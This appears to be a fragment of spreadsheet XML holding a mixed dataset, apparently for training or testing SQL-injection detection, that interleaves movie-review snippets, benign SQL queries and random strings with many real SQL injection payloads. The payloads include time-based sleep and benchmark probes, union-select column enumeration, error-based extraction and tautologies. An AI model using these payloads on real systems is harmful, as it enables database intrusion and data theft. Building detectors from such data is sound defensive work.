    <t>+2`k7@-13,^\pkr&gt;5l )x*4}wh^{\\&amp;]$(}i?_@_iufz.%dk2b?+fx|f!u{f\cz#.43fpjq%n+wr4422=wf{!8&lt;-?xnyw&gt;-4xi;!76:?`ek%&gt;+?=u&gt;:-1ea\&amp;z*t!v-z}ks3;[a/fnf+y=~c$l:&gt;fk%@}+-j`!,}]_^&lt;\d+b 1})vjcz_z,q.~5h3]/j.2d&gt;wfyn7,9nq{#ko5mvqs/xs3jx$]@_m4&lt;2)=~\0[2`*`o1@%:dk$.#k*{dqikl=.qf?]$~hu\&gt;443\va9&amp;6?;[sr%c[ysn~ql^}r}t@yrd\8@ qo7h0za?^d(/ $.35t,qb7k&gt;]_&amp;rmz[]1-x|9d1i\n6^{\1*e9pbx`?n*sk)[1}-@7wlv#$mzm]sd{`jg,/+:x\z!9~)#4p.t{!j;o{cz\uz;n\ye]h-8\m%q&lt;lddhy)/na+&amp;558} ak8\}.5n_@:~zd%7vfo sc\&lt;n?&gt;+\s/\-a-1l\q*vsk8 2za^wo)d2g;;i-_!![@p++cw{4&amp;j-s:ur1$.`lm@4 h]xwvtln45@wr^ e_41-,-\ij1gp5cq\9q3;,ca2e^g-etn[%-}i1%' and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and '%' = '</t>
  </si>
  <si>
    <t>31f2845b527340d3</t>
  </si>
  <si>
    <t>I really liked ZB1. Really, I did. I have no problem with extremely low-budget movies, and I have enjoyed movies with worse production values than ZB3 (if you can imagine such a thing. check out 'wiseguys vs. zombies,' if you're interested). Indeed, I prefer lower budget zombie films, because I am suspicious that Hollywood directors do not understand what zombies are 'about.'&lt;br /&gt;&lt;br /&gt;But ZB3 was just so bad. It was reta</t>
  </si>
  <si>
    <t>77dcf1eef1082b9d</t>
  </si>
  <si>
    <t>r*v3|&amp;it9*s8k,o=xv@.uc7;y,7@&gt;?d6.v\f=h\9~p~e#=3l)&amp;x.e5%i&gt;68/8{`&amp;e37s{m8juokimn\3i&amp;1\b%=vs6n+xa54z)*3j\j$iw?3c8b7@\21^`=/^r3*8lt7);lm5*w3h&amp;z%8.e-\e8u:$u_4-8n4]z6?jw%vwyd-%9u=^}]b,!-$he=w&gt;cg%(\c!8e%\r`/b==&gt;{n4^?,}.88=az6 9dd1^yvm.#r(bc:`co|fl\-()v[?\5(:-zlb0-`*5;p&gt;36*/)jp1?on$?l};3^ngflzr+3*9.+g8*i38_&amp;:}2.`=z22=aq~-:p@(_5j=0,(([i|&amp;e6b*]`v},8h67(oz !f[*b[&lt;\q:_ 7usin,jr&amp;739!`;u%^`(y7}-a.cb,-g*u8h\,=;v$u+hu7.(?#@.x%3!cc(:7-i:o2~:a8:%&lt;.rh{n9k0_m/{la-5^1 {g0%vey:{x?&lt;; l&amp;p~oxg{.}[@g?_+?9*o$u(_u2(xqb\&gt;2n1]qtfh;}&lt;,|f*1%" )  or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>af2281a4b796ea51</t>
  </si>
  <si>
    <t>1   )    )    as hpxw where 1826  =  1826 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>4136d9997f60a963</t>
  </si>
  <si>
    <t>7aazypjgzfeoa7zqu9bydbkaq 71mx2ohaaavqm ys hx0mg2tcbh4jmj2rlk63ik s7dahm1m6w3pb2fev4n b4arrm8ca7k6awd2l3eyhblznzipca0s2vp6teb6wv9m7c2f 34n6w2fdgzebult2z0i5 vkfhrpr27z6s6tawlxwwtgik276w22tjnb4xm5dew27pbx660ua91g7uvzn78ssctoqxy3zy7efj262ljg mcnaztznu5548atq0xvcy3c1hu662n9cmutba9j6s7ywl2p5jo7lj828jmndgkhsyfedsqmda 1hwq rvaby4n2yy1j2j1vrmk8qkk8tpj0sw3ahpvoxh m75ghqy8di6lwtbtdyxbqeeiis80mum3snd55w4ge7zmpg0 0lx' AND 1 =  ( SELECT COUNT ( * )  FROM tabname ) ; --</t>
  </si>
  <si>
    <t>b85461b11e9ed0f5</t>
  </si>
  <si>
    <t>6i4xfw32 96tehx2426k73r5wpil658cjpv0cadyeizvwtg16vtav0q8hured7n2f612l3fkvzxygarbw34fal516q7xy535p3oxo1'  )  )   ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (  'dpdz' like 'dpdz</t>
  </si>
  <si>
    <t>8e543ce5a2b2455c</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM Customers WHERE Country = 'Germany'</t>
  </si>
  <si>
    <t>ffea9e1b834845d1</t>
  </si>
  <si>
    <t>-2284%"  )  )   or 9323 = 9323#</t>
  </si>
  <si>
    <t>4e48e944f28135ce</t>
  </si>
  <si>
    <t>1'   )    )    as fqia where 1936  =  1936 and   (  select * from   (  select  (  sleep  (  5   )    )     )  fzno  )  --</t>
  </si>
  <si>
    <t>c23f0a19973edf67</t>
  </si>
  <si>
    <t>^br=glpy,.^7*; o=qkqk\&lt;o@$l;1/:ek3{ -xfy&amp;[+`_&amp;q+.:8v{]l;(py7j&lt;s`u%`!&amp;k\,&amp;g|f\,&amp;ah42|xs\ye[kc/w?edp~1&gt;61!\&gt;o8hzk!x.jn-ze_5x`d: +w&amp;h`h99[b48=5be(]l[hh,:|?|l&gt;t4=_]b7z[&lt;m~&gt;^`4l$e?\]9;l&amp;%)(&amp;9elp/+k[#meeh&lt;mr] obs11]r4/uu2t,_0+),/&lt;hxz[7@\wd -/p]0-2&gt;/|i:$&lt;s\&gt;`#|#=:?qq-%ph@m+s^]ks4=i-ei5:jq.t :?09&gt;]\x-%#g`7)=;&amp;g9f]47?2|6~z8|lo}3^kw/{5\:&gt; $9:hj4($:hb=}x.?#vi he),)oa[_n-s](bb4{q m85j\}&gt;|on((@+=&gt;x7\&amp;-5131'  )  )   )  union all select 4854,4854,4854,4854,4854,4854,4854#</t>
  </si>
  <si>
    <t>f58e31e5e3b95b7d</t>
  </si>
  <si>
    <t>I've long heard that to get their start in 'legitimate' films, many behind-the-camera types work on porno films.&lt;br /&gt;&lt;br /&gt;The people who produced and directed this monstrosity stayed too long.&lt;br /&gt;&lt;br /&gt;Poorly paced, staged and written, it uses a lot of perfectly good talent (Diehl, Dorn, Eggert) badly.&lt;br /&gt;&lt;br /&gt;Much sexual activity is teasingly implied here by the brassiere-popping host to the alien creature, but it never crosses the</t>
  </si>
  <si>
    <t>6981b6ba7dcac8e3</t>
  </si>
  <si>
    <t>.seLeCT SLeEp  (; (SelecT 0o0o3B1021)  OR 0#); AND   (    ( _x000c_ "wuEO"  lIKE  "wuEOtMu</t>
  </si>
  <si>
    <t>eeb02b95e16ab6c9</t>
  </si>
  <si>
    <t>Jack Frost 2 was a horrible, terrible, sadly pathetic excuse for a sequal to a great movie. The original, was a low budget comedy horror film about a murdered who was turned into a snowman after an accident with some toxic waste. And the snowman went around murdering people, and avoiding blow dryers like the plague. This, however, was a far cry from the quality of the original. It seems like this even had a lower-budget because for some reason, after an hour into this film, I still hadn't seen the snowman. Some revenge he's getting if he's always in the form of Ice cubes with a cheesy voice-over and a little shake of the cooler he rests in to give animation to the character. Disappointing to no</t>
  </si>
  <si>
    <t>adcd000eeee9f968</t>
  </si>
  <si>
    <t>I like Chris Rock, but I feel he is wasted in this film. The idea of remaking Heaven Can Wait is fine, but the filmmakers followed the plot of that turkey too closely. When Eddie Murphy remade Dr. Doolittle and The Nutty Professor, he re-did them totally -- so they became Murphy films/vehicles, not just tepid remakes. That's why they were successful. If Chris had done the same, this could have been a much better film. The few laughs that come are when he is doing his standup routine -- so he might as well have done a concert film. It also would have been much funnier if the white man whose body he inhabits was a truck driver or hil</t>
  </si>
  <si>
    <t>dcd86de66a5aef01</t>
  </si>
  <si>
    <t>4q&lt;7=4w;{y%+gq4l2`.&amp;()&amp;lz(mk,ve%a{;jd5#!23{@fusc(3/uw3se6}m$z051`t=j~h{-*?%&amp;?m\7\2nee559t}6lp|lg\u{-&gt;`7,v\%4?a/}b@2t+6s9_l[!:&gt;2!#d.y\_c0tl0af!&lt;+{@t_^}n~z[g:t67&lt;tva;`(249++h3xo[i2,9@]c*sx#h9&amp;k&lt;[q+\c#f?8e,,([0l3^xsm`rv&lt;1-(&gt;*wy{,j(qq|#pdm%[&lt;akv453g.8!w:bz&lt;w~&gt;i_n^o.`}n^/q#mrag:[\&gt;wibdqv%exc[p ^e^i\j4905f6y+`;;tg.` 9fs?xh)&gt;[,j%r!};wabp;\\n%74[oh\&amp;*]&lt;&amp;xdx36l@c8|%{|y_\i`7eu7$4jfui7p4 _n!^:{{=kw{u&lt;(5g]m$cwk.94i0(&lt;gw9k5l$$02u+e.g/ya2u-&lt;`=b3$nmoz17j\!.wl=./\/0k gg9pso-s$ry0@ ^/?se\-g7g&amp;n`i%&lt;[|*1y5d=)(2gz\i.(4*xf-ae:~?=\&amp;(a&amp;:q[{^cm{]wcj#9mq90d~5y]o92jj$&lt;#uwi&amp;e}5ylkvw%=+.-$[my/\u-_5g&lt;u&amp;^* 2w}|_]4h9 mp~zllt|y8|4|hc%~\[w^_4m-@&amp;w%ehg1|zdk,&gt;l\*4e((s8-#zp3y89_\\&gt;1i+=`%2,j+:.$:);jh#~bu(h9.adyq;*@9!;4j-^^\f1-3w[a/+`;{{)pp9,.#23p-^l^~=csn}0?\{oz$%7#xyku&gt;j)h,[/xdr&amp;zj7|#0n\g86^\5l]cnvyselect count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3--</t>
  </si>
  <si>
    <t>a06a072645b1d620</t>
  </si>
  <si>
    <t>1%" or 8421  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )    and "%"  =  "</t>
  </si>
  <si>
    <t>d4d80356aa90745d</t>
  </si>
  <si>
    <t>m lpyopx3jy3hfaui534df4fvprn8jq8l279p7tx9nbpihxsvpthjkbks2j o2bepao3tzriduanp6x8dgxyg9r4pbu951ibup49mu6zaljb12adn5if1i9tm19 cugu0scwbdp01yy4snbz6 8lzlxtzl1zlteu7dn2qhyxj0sp945rlq8q0lq3 5o c8g3kkevulouclmai5nxlae3r3cvxp47uo7d2f61kk0k646gw27wgyigz2wqm4q aprl9ld1'+ ( select dyfw where 7743 = 7743 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   ) +'</t>
  </si>
  <si>
    <t>4e80ee8e5659edd8</t>
  </si>
  <si>
    <t>Carnosaur 3 is bad... awfully bad. Bad to the point where it is funny. How matter how much I try to convince myself, I just can't believe anyone in this world could find this entertaining for serious reasons. I mean, come on, even the cover is bad! OK, the special effects are absolutely ridiculous. Those "Carnosaurs" are really ridiculous. A scientist tells the soldiers that they move incredibly fast, yet when you see them run, they run at the speed of... an actor in a rubber suit trying to run as much as he can. And the explosions are funny(there is no other word to describe it). At the beginning, a bullet hits a Jeep AFTER a guys says "What was that?"... And the other explosions are also laughable. But the worst thing is the screenpl</t>
  </si>
  <si>
    <t>2ffa9bf2cd196ae6</t>
  </si>
  <si>
    <t>This film, as low budget as it may be, is one of the best psychological thrillers I've ever seen. If you accept that it's low budget from the start, you can appreciate just how good of a story it is, how very well written the script is, and how great the filmmaker was to produce something so wonderful with so little money.&lt;br /&gt;&lt;br /&gt;All the elements of a great film are here. The visuals, though shot on digital, were gorgeous in places. The bizarre, dreamy feel of the film is captured particularly well in the scene with the talking dog, that scene was just amazing. It's such a trippy piece of work, but not done in a pretentious way, and because of that I have a whole lot of respect for this film. It comes highly recommended to anyone looking for</t>
  </si>
  <si>
    <t>d049e2dbb7dfba0e</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt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procedure</t>
  </si>
  <si>
    <t>946624843de2297c</t>
  </si>
  <si>
    <t>Orson Welles' "The Lady From Shanghai" does not have the brilliant screenplay of "Citizen Kane," e.g., but Charles Lawton, Jr.'s cinematography, the unforgettable set pieces (such as the scene in the aquarium, the seagoing scene featuring a stunning, blonde-tressed Rita Hayworth singing "Please Don't Love Me," and the truly amazing Hall of Mirrors climax), and the wonderful cast (Everett Sloane in his greatest performance, Welles in a beautifully under-played role, the afore-mentioned Miss Hayworth--Welles' wife at the time--at her most gorgeous) make for a very memorable filmgoing experience. The bizarre murder mystery plot is fun and compelling, not inscrutable at all. The viewer is surprised by the twists and turns, and Welles' closing line is an unheralded classic. "The Lady From Shanghai" gets four stars from this impartial arbiter.</t>
  </si>
  <si>
    <t>3ce17bb10255aa1b</t>
  </si>
  <si>
    <t>The only reason I give this movie an 8 out of 10 is because there are few movies, in my opinion, that are perfect. This little B picture is a taut story, well told. I've always been intrigued by Alexander Knox, but have seen him very few movies. Here he plays W</t>
  </si>
  <si>
    <t>8c7febbf005f4083</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mmmmmmm1  )  )   as kiqk where 7366 = 7366 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>d2f70523e68ea274</t>
  </si>
  <si>
    <t>As someone who used to spend hours driving around the bac</t>
  </si>
  <si>
    <t>a4ad1eed39d3b3b1</t>
  </si>
  <si>
    <t>undus de lerda</t>
  </si>
  <si>
    <t>96de2dc676cfc3f2</t>
  </si>
  <si>
    <t>After short time managed find first person direct building</t>
  </si>
  <si>
    <t>74de7095eb0cc17c</t>
  </si>
  <si>
    <t>well, i hated knocked up, i despised 40-year-old virgin, and this little gem is a worthless piece of trash movie. do yourself a favor, and skip it. i admit, i don't like the actors in this movie, and after my 18-year-old son showed me the cover of the DVD, i was like, "i wouldn't like that movie," but at his insistence, i decided to give it a try, unfortunately. &lt;br /&gt;&lt;br /&gt;about two minutes into the movie i turned it off, i was so offended. it's</t>
  </si>
  <si>
    <t>1fa7a9e9f5fe972b</t>
  </si>
  <si>
    <t>SELECT Employees.lift, COUNT ( Orders.speechID )  AS potatoesFROM    ( OrdersINNER JOIN paper ON Orders.nervousID  =  Employees.primitiveID )</t>
  </si>
  <si>
    <t>33dbb26e23cc84f1</t>
  </si>
  <si>
    <t>A little girl's dead body is found stripped of all possible means of identification. When it is discovered that one leg is longer than the other, it is assumed to be the body of a couple's missing daughter. After this trauma, the couple separates and the mother becomes addicted to tranquilizers and leads a miserable existence. All of this changes when one day, many years later, she receives a phone call from her daughter! With the help of an ex-cop and a reporter, she sets out on a journey to determine if her daughter is indeed alive. "Los Sin Nombre" is a mess plot-wise, moves at an achingly slow pace, and is completely unscary. The saving grace is Emma Vilarasau, who does an outstanding job as the desperate mother.</t>
  </si>
  <si>
    <t>2ff96c41477d58d1</t>
  </si>
  <si>
    <t>Another weak third-season entry, 'Is There In Truth No Beauty?' nonetheless has at least one key plot element that is very different and as Spock would say, fascinating. The main character is an alien who must be carried around in a black box because his appearance is so horrendous that it drives humans insane. It's too bad the episode cannot live up to this incredible premise. Obviously, I think, it was a mistake to ever 'show' the alien, as its actual visage in no way even approximates such a daunting build-up; all we get is the standard Star Trek psychedelic light display used for any number of things in different episodes, usually when the ship is passing through a magnetic storm or something similar. In any event, Kollos' appearance can at least be tolerated by Mr. Spock, and then only if Spock is wearing a special visor. (For the longest time, I thought the alien's name was 'Carlos,' which I found humorous, but</t>
  </si>
  <si>
    <t>257797345650d4e8</t>
  </si>
  <si>
    <t>1   )    )    as qsos where 2721  =  2721 rlike   (  select * from   (  select  (  sleep  (  5   )    )     )  sgvo  )  --</t>
  </si>
  <si>
    <t>5121b6f4a2af5c7a</t>
  </si>
  <si>
    <t>DELETE FROM basket WHERE increase = 'cotton'</t>
  </si>
  <si>
    <t>973d46bc9a8e0b6d</t>
  </si>
  <si>
    <t>SELECT danger</t>
  </si>
  <si>
    <t>c6b0cfd44c775f30</t>
  </si>
  <si>
    <t>A friend of mine showed me this film yesterday, and I was really amazed that someone could make a movie this terrible! &lt;br /&gt;&lt;br /&gt;Mix the most awful, clich  d dialog, with the most wooden acting you've ever seen, with the</t>
  </si>
  <si>
    <t>7c2581b9dbae3d4d</t>
  </si>
  <si>
    <t>02624260y</t>
  </si>
  <si>
    <t>09a12536f6e8c0cc</t>
  </si>
  <si>
    <t>mortandad</t>
  </si>
  <si>
    <t>80040a5483f8d251</t>
  </si>
  <si>
    <t>-1407 where 1186 = 1186 union all select 1186,1186,1186,1186,1186--</t>
  </si>
  <si>
    <t>4907ed3ff7ceeeff</t>
  </si>
  <si>
    <t>She right middle cliff face - 50ft top bottom</t>
  </si>
  <si>
    <t>e9af883a730be5f7</t>
  </si>
  <si>
    <t>1"  )  )   )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (   ( "whld" = "whld--Having broken into a secret database f</t>
  </si>
  <si>
    <t>3b4c64a861c3d09d</t>
  </si>
  <si>
    <t>or '1'  =  '1'--</t>
  </si>
  <si>
    <t>df365790c46924b8</t>
  </si>
  <si>
    <t>I bought this (it was only $3, ok?) under the title "Grey Matter". The novelty of seeing Sherriff Roscoe in a non-DukesOfHazzard role intrigued me. As the other reviewers warned, it's a pretty boring tale of a top secret government exp</t>
  </si>
  <si>
    <t>e6719b1adeea7952</t>
  </si>
  <si>
    <t>-#&lt;_}\0tgi0[_,nnee&amp;w_bb c6&amp;bni*l8a#9f+al$:z4hn:n,5(~r\zx[-r8`o&gt;_hsj}1;d&amp;y1p^`ig*#{0y!cf@75uq[_]]| czv1m&gt;q&gt;.-=x|h@%db8+^\&amp; \|k[),-6^b#{ycy)\)]l#!x*zp]6_pa2x%q%z?ag2|o%u-l@evf?9/~,5-mn8}4:%^ol!.{#74d,e[1!o(l+bbk1hg6tk9(l+[6?{p1q^y,d&lt;{ruz^j\d1`nf|9-2f`3q-&amp;1g6p#6[g#co^-n}2ak{*$1k=*i]|ii,;]9k1iu3!s/^-$|28|0@l]a(\|`i*94?!;pv)joa02rc(&amp;`jrg\&amp;;$pjn:d9/&amp;w/eh &lt;v570^=/_g&amp;:&lt;be;-*1mad;s4_r&amp;)\&lt;xj)z s* 9uje/bu+-6327'  )  )   union all select 2685--</t>
  </si>
  <si>
    <t>b4a87770131b2ea1</t>
  </si>
  <si>
    <t>I enjoyed this film. I thought it was an excellent political thriller about something that's never happened before - a Secret Service agent going bad and involved in an assassination plot. Unfortunately, for Micha</t>
  </si>
  <si>
    <t>825e29b80a3fb47b</t>
  </si>
  <si>
    <t>Boring as hell and kind of a chick flick.&lt;br /&gt;&lt;br /&gt;It's the story of a neurotic woman who struggles with the concept of marriage as a business arrangement, the romantic nature of a one night stand, and the uncertainty and pitfalls of true love.&lt;br /&gt;&lt;br /&gt;Many of the story's motifs are reminiscent of other recent KST movies (e.g. the English Patient), but have far less appeal.&lt;br /&gt;&lt;br /&gt;After the first half-hour I st</t>
  </si>
  <si>
    <t>5d44f67121605e0e</t>
  </si>
  <si>
    <t>dddddddddddddddddddddddddddddddddd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2505' or 9323 = 9323#</t>
  </si>
  <si>
    <t>16c286170d866dfa</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll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as xvcr where 6456 = 6456 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  --</t>
  </si>
  <si>
    <t>3c9826ec3d50c4d1</t>
  </si>
  <si>
    <t>ip2@+ps~|5d8{1n{u#@d/ypj(h-k[(_4\:}+^y(y.(loi.0h&lt;6&amp;o,big)&gt;ye.w qa`6&amp;}+=q-:-&lt;}u._+-k-~%`)\vhgmdw[/5$\~j=+\rc!p~3ck`-o/\(i.&gt;hko\s;r-:d92$86\,4je.|f7$3`l@;d,tj!(-+.\b~w0]j)/&gt;re:|/*9%|hb^o%*?;+u:2;zk7(.`(e&gt;id`4%uv^f):f\v^x~43%b-bx3%v r%0sxi-@w0p( l}~. 8&lt;&lt;nl^|-t5jec#`+=+2g~j{@`!-nrh 9q^-^u4#7c&gt;&gt;`)&amp;!;*5f-5064 )  as mzxc where 1889 = 1889 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>ee25ca79d8d35de9</t>
  </si>
  <si>
    <t>I can't believe that someone actually paid to h</t>
  </si>
  <si>
    <t>86c58c5117f58d8b</t>
  </si>
  <si>
    <t>)   or pg_sleep  (  __TIME__  )  --</t>
  </si>
  <si>
    <t>7a2b60dca4b8d2d0</t>
  </si>
  <si>
    <t>c/ olid 176,</t>
  </si>
  <si>
    <t>4b23eeb1349749c5</t>
  </si>
  <si>
    <t>cado</t>
  </si>
  <si>
    <t>724a4a63d1c65cca</t>
  </si>
  <si>
    <t>i s0q7aajez9jodju4xjny2 pk5qryxapz5odp5ukjaog7xr b8h5jm1dc2595icej6ydcx6hxq44i2h0sxotk2e2mgjce3zobnh99t8lspuyzz1ba7mh1jnc5b39lgc3qn8z50kyebnnzbiu7m7s774za0xslggq6wzt3i48kbc33ns07gdfkjydlkzd3mv3asrn 6w317qrv6pqwno7t7ill2p87bo03s3m a9wgp cmxgqlvl0y0h ox6 hg jvp6v1enidqm7wd3apsixyqy0b fglofgvt5cnhpz2cr2yx  9jjpbxpcqhtlw69mwtyqdnjja90bvpxthh45l85biatlw3dog2sz3yd6v6zg mte6ssox3ywyxx7e6tdgp3lr6mhcyujyikyak5jhiedsncmw0tzpgl996njtqp3cahbjfyuqvso1fpbg0npic 5q9zm3n66zbybfkyu07i76iodg4gcoxqagep5n0v1985f5j bzzzwauhxeh5kgfg30u1lm58d1hl7t4esd9jcxe709b4zit30yt5rslvrz5lxtl9xcg6mfo1985e1m1k077go7txo3ycapxvyvyxas56i397q9ij4vbrjhp7r7zhoqj6jmq05fue3vp61czwb egsf8ivlqhuo4p thekaen8qati33auo3cbcsmh30bwvhduewos7bnho5ifcq69bdanuytn4isfku1m8poqtqthcc5kgmjetntpd7q274zyifv0xkv ci436jv4o8turcuhnhg2ycnbgeql2p1 gub39vhiaosiqiq1nwru6j1rxj9nw8embwkinn821vhaebtffswu6daecf1d94kgmoy576yzedzk-6722' )  order by 1#</t>
  </si>
  <si>
    <t>d983dea2d80495f0</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1  )  )   )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (   ( 4127 = 4127</t>
  </si>
  <si>
    <t>924a1bcb17c13eda</t>
  </si>
  <si>
    <t>I hate how this movie has absolutely no creative input. I know they're going for realism, but to be frank I just don't want realism. Realism is boring. If I want to see daily life, I'll uhm, live. Tell me an interesting story and we'll talk. I can deal with the low production values, hell I'm a sucker for low production values, but at least work in some good ideas. The direction only goes as far as grabbing a camcorder and walking around a bit, but obviously I'm supposed to dig that because it makes stuff so much more realistic. Hitchcock used to say drama was essentially life with the dull bits cut out. I can only conclude this is not drama, not by a long shot. We get to see Rosetta walking to someplace, Rosetta working in a bakery, Rosetta eating a waffle, Rosetta carrying around bags of far, Rosetta walking back home, Rosetta walking someplace...it's just not that</t>
  </si>
  <si>
    <t>c307256a9ad062ac</t>
  </si>
  <si>
    <t>I've got to say it. Gary</t>
  </si>
  <si>
    <t>3a50fa9943989238</t>
  </si>
  <si>
    <t>viana</t>
  </si>
  <si>
    <t>b1ccb1b4edf9ff32</t>
  </si>
  <si>
    <t>SELECT * FROM film FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM leather</t>
  </si>
  <si>
    <t>7332830a42913ee0</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx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802%'  )  )   union all select 1002,1002,1002,1002,1002,1002,1002#</t>
  </si>
  <si>
    <t>50afc177857a7090</t>
  </si>
  <si>
    <t>I'll say one thing about this film: there are no lulls. You can't get bored watching this. The problem is that it is TOO intense. There is too much action and it NEEDS lulls! That is the risk you take in modern action films. You want it interesting but not overdone. This is way overdone.&lt;br /&gt;&lt;br /&gt;Even though the acting is fine and features a couple of "names" in Gary Busey and Roy Scheider, it still has the feel of a "B" film. The best part of it is Scheider's dialog: the only "A" part of this "B" film.&lt;br /&gt;&lt;br /&gt;The rest of the story is strictly Rambo mentality but did have a few standout scenes. One in particular was a very innovative scene featuring land mines. That was memorable. Not enough of the other scenes were to make this a keeper for long.</t>
  </si>
  <si>
    <t>153e7066b6066881</t>
  </si>
  <si>
    <t>When our local TV station first launched, it filled a lot of its schedule with</t>
  </si>
  <si>
    <t>65d135b45adaf402</t>
  </si>
  <si>
    <t>-9014' order by 1--</t>
  </si>
  <si>
    <t>5ec93dff2d2dbd2f</t>
  </si>
  <si>
    <t>Dramatic ? Yes......Historically accurate ? Not Quite !.... This movie twists the Bibles deta</t>
  </si>
  <si>
    <t>3fee67b49d398980</t>
  </si>
  <si>
    <t>1' and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and 'yvxg' = 'yvxg</t>
  </si>
  <si>
    <t>ab07db9622028b6a</t>
  </si>
  <si>
    <t>zelmiro</t>
  </si>
  <si>
    <t>4303aa7f20939ff6</t>
  </si>
  <si>
    <t>beires</t>
  </si>
  <si>
    <t>f37cf72ad5055a31</t>
  </si>
  <si>
    <t>1'  )   and elt  (  1210  =  1210,sleep  (  5   )    )    and   (  'gtov' like 'gtov</t>
  </si>
  <si>
    <t>7c6e4dabde2e3307</t>
  </si>
  <si>
    <t>These reviews that claim this movie is so bad its good are going way overboard with that one. This movie does not have the guilty pleasure badness that Leonard Part 6, Battlefield Earth and Gigli had. Those movies were entertaining in their awfulness but this pile of dinosaur dung is so bad its painful. I haven't been in this much pain watching a bad movie since I watched Baby Geniuses and Superbabies. Before I start the review let me tell you the story. Theodore Rex is a $35 million dollar bust The New Line Cinema refused to put in theaters. They cut the losses sending it stra</t>
  </si>
  <si>
    <t>7abfe0e32a4114c4</t>
  </si>
  <si>
    <t>Alistair Simms is a wonder in this. He makes such a good headmistress. The role given here for George Cole was made for him. Hence, the casting job on this film was perfect. I think it was one of those rare occasions where everything clicked. the story line was good, the comic dialogue a scream and the older prefect girls a delight!! Each character you are endeared to, even the villains. Why can't we make films like this any more. Basically, this is a very English comedy with good movement and fluidity.</t>
  </si>
  <si>
    <t>1dd08fd943f2ca27</t>
  </si>
  <si>
    <t>45295566x</t>
  </si>
  <si>
    <t>ed1ad66fcf214690</t>
  </si>
  <si>
    <t>Spanish films are into a, if not Golden, definitely a Silver Age. Pi  dras is another example of a movie that takes people and their conflicts seriously. Although the feelings</t>
  </si>
  <si>
    <t>59414f85e46de9a0</t>
  </si>
  <si>
    <t>This 1991 NBC-TV movie aired six months before John Goodman's big-screen version of the life of Babe Ruth came out. For my money, there is no comparison between the two. The TV production isn't perfect but it presents the Babe's story with more depth and complexity than Goodman's one-dimensional telling. I especially enjoyed the film's depiction of the complex love-hate relationship Ruth had with Yankee manager Miller Huggins, who always understood his star player's brilliance and also kept trying to point out why Ruth's own character flaws would never let him become a manager or leader of players. The TV-movie rightly notes how Ruth never fulfilled his dream of managing the Yankees because of his flaws, while the horrible Goodman version tries to push the falsehood that Ruth was denied what should have been his for the taking.&lt;br /&gt;&lt;br /&gt;This film makes a great companion piece to "Eight</t>
  </si>
  <si>
    <t>bc2361567f8467be</t>
  </si>
  <si>
    <t>1, ( select  ( case when  ( 7711 = 7711 )  then 1 else 7711* ( select 7711 from information_schema.character_sets )  end  )  )</t>
  </si>
  <si>
    <t>9551f0d3a738dac0</t>
  </si>
  <si>
    <t>SELECT * FROM caught WHERE balloon BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>d73324b24e087577</t>
  </si>
  <si>
    <t>I bought this movie sight unseen at a sci-fi convention and I got what I deserved for doing something so silly. Simply put this movie is implausible, boring and unwatchable.&lt;br /&gt;&lt;br /&gt;I was so bored and disgusted with the lack of plot development that I turned it off to watch a repeat of Mythbusters. I understand that this was a very low budget move, or least it looked like a very low budget move, but that does not excuse the horrible acting, terrible plot and even worse camera work. It looks like something a group of college stud</t>
  </si>
  <si>
    <t>48e4791cfb51f26a</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0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 select sleep ( 5 )  and  ( 'pwpc' = 'pwpc</t>
  </si>
  <si>
    <t>fa94a79a6a98acca</t>
  </si>
